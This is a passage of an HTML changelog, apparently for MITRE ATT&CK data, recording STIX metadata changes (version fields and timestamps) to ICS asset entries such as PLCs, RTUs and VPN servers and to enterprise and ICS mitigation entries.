1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28T14:46:42.566Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28 14:46:42.566000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-27T16:47:33.077Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0012] Jump Host</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28T17:52:53.206Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28 17:52:53.206000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T00:58:05.830Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0018] Programmable Automation Controller (PAC)</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-09-29T18:56:19.712Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-09-29 18:56:19.712000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-27T16:50:01.628Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0003] Programmable Logic Controller (PLC)</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28T14:43:05.105Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28 14:43:05.105000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-27T16:47:46.663Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0004] Remote Terminal Unit (RTU)</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28T14:44:54.756Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28 14:44:54.756000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T00:58:18.239Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0014] Routers</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-29T18:55:09.319Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-29 18:55:09.319000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-27T17:45:55.901Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0010] Safety Controller</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28T15:10:05.534Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28 15:10:05.534000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-27T17:25:50.475Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0015] Switch</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-09-24T17:53:28.482Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-09-24 17:53:28.482000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-27T18:01:55.383Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0011] Virtual Private Network (VPN) Server</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28T15:13:07.950Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28 15:13:07.950000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T00:57:53.372Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details><hr><h4>[A0001] Workstation</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28T14:22:49.837Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2023-09-28 14:22:49.837000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T01:04:34.868Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.768000+00:00</td></tr></tbody></table></details></details><h2>Mitigations</h2><h3>enterprise-attack</h3><details><summary>Patches</summary><hr><h4>[M1036] Account Use Policies</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-12-10 15:55:53.913000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[M1047] Audit</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-12-10 16:28:27.046000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[M1042] Disable or Remove Feature or Program</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-12-10 19:21:06.027000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[M1038] Execution Prevention</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-12-11 18:10:27.976000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[M1037] Filter Network Traffic</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-12-11 19:43:03.354000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[M1030] Network Segmentation</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 19:41:50.467000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[M1056] Pre-compromise</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-12-18 18:24:37.835000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[M1022] Restrict File and Directory Permissions</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-12-18 19:18:58.856000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[M1024] Restrict Registry Permissions</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-12-24 13:34:49.309000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[M1018] User Account Management</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-12-24 14:33:36.029000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[M1017] User Training</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-12-24 14:36:46.335000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details></details><h3>ics-attack</h3><details><summary>Patches</summary><hr><h4>[M0801] Access Management</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:47:44.798000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr></tbody></table></details><hr><h4>[M0947] Audit</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:54:39.756000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[M0800] Authorization Enforcement</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:54:03.965000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[M0946] Boot Integrity</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:55:57.931000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[M0945] Code Signing</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:54:56.965000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[M0802] Communication Authenticity</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:54:21.289000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[M0808] Encrypt Network Traffic</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:55:38.098000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[M0941] Encrypt Sensitive Information</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:56:16.357000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[M0937] Filter Network Traffic</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:45:45.801000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr></tbody></table></details><hr><h4>[M0804] Human User Authentication</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 00:50:55.165000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.730000+00:00</td></tr></tbody></table></details><hr><h4>[M0816] Mitigation Limited or Not Effective</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid 